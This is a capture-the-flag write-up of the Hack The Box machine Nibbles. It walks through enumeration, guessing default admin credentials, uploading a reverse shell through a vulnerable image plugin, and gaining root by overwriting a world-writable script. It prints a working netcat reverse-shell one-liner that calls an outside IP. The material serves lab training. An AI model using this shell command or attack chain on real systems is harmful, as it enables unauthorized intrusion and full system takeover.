HTB - Nibbles
Another day, another box. This one is Nibbles from HTB. A fairly straightforward exploitation that reinforces some good enumeration habits.
In an acorn, we find a webpage with nothing going on. A review of the source code reveals a directory that we can gobuster. We find an admin panel and use some CTF-FU to get it in. Once we’re in, we need to actiave a plugin that allows us to upload a reverse shell. For privesc we find a world writable script and use it to gain root.
As for the OSCP what did this box teach me:
- Enumerate, enumerate and enumerate (I literally ran three gobuster scans)
- Enumerate extensions!
- Learned how world writable files are silly easy methods for privesc
Lets go!
Walkthrough
Nibbles IP address is 10.10.10.75
As always a nmap scan to start off the recon:
data:image/s3,"s3://crabby-images/84c54/84c542c9d3bac5f6f4cdd3187dfa2a82707b00dc" alt=""
We find two ports open:
22/tcp open
80/tcp open
Nothing to report on the full port scan
We travel to 10.10.10.75
and smacked with a page that tells us nothing:
data:image/s3,"s3://crabby-images/5f984/5f984f0d16a9fdb859261a7a9a274ed2b89e552a" alt=""
A gobuster here, reveals nothing, so I decide to check the source code of this page to see if there are any indications of something and boom:
data:image/s3,"s3://crabby-images/47044/47044fc65b2f3b8f92ed7a84747e0cf383e276b9" alt=""
Now I rerun my gobuster scan with the new directory and hit paydirt. Directories for days!
data:image/s3,"s3://crabby-images/489e0/489e0d97b2e06d8cda83a3e66e4a1f54a75b1bd7" alt=""
But believe it or not, still hitting dead ends. What am I missing!? Oh yeah, extensions!
I rerun my gobuster scan now a third time with extensions and get some more insight as to what’s going on:
data:image/s3,"s3://crabby-images/dad6f/dad6f761def94221043e12d93830982de3434636" alt=""
Now I see what I missed: admin.php
!
I travelled over to the page and was hit with a login screen. Now this is something I always do when I come across a login page on a CTF or machine:
- admin:admin
- [boxname]:[boxname]
- admin:[boxname]
The password here was admin:nibbles
Once I was here I had full administrator access so I immediately started hunting around for ways to upload files and came across this:
data:image/s3,"s3://crabby-images/fd7b3/fd7b3cf946ecd4b57f7cdc470b8f016d265685d4" alt=""
Now that I have version number, I can use google to hunt for previously known exploits.
Nibbles is vulnerable to image plugin upload which allowed me to upload a fancy reverse shell.
data:image/s3,"s3://crabby-images/64d8f/64d8f33b0df04f97b3fed1ed896c99276450d1b4" alt=""
From here I clicked on image.php and popped a shell.
I apologize for the lack of pictures here, as I must have forgot to take them. But once I popped the shell I found that monitor.sh was world writable.
I added(overwrote):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.7 1234 > /tmp/f
and executed it:
data:image/s3,"s3://crabby-images/66815/66815e25eaca03f0ce002afbe84bde18bfc9922c" alt=""
data:image/s3,"s3://crabby-images/1bdcc/1bdcc8f37766c08957bd216479377c8d69392929" alt=""
data:image/s3,"s3://crabby-images/fcb93/fcb93fc920b2bb334edc4d971bf5eff3bcac749c" alt=""
Fun, easy quick box! Think it’s time to up the ante and try on some tougher ones!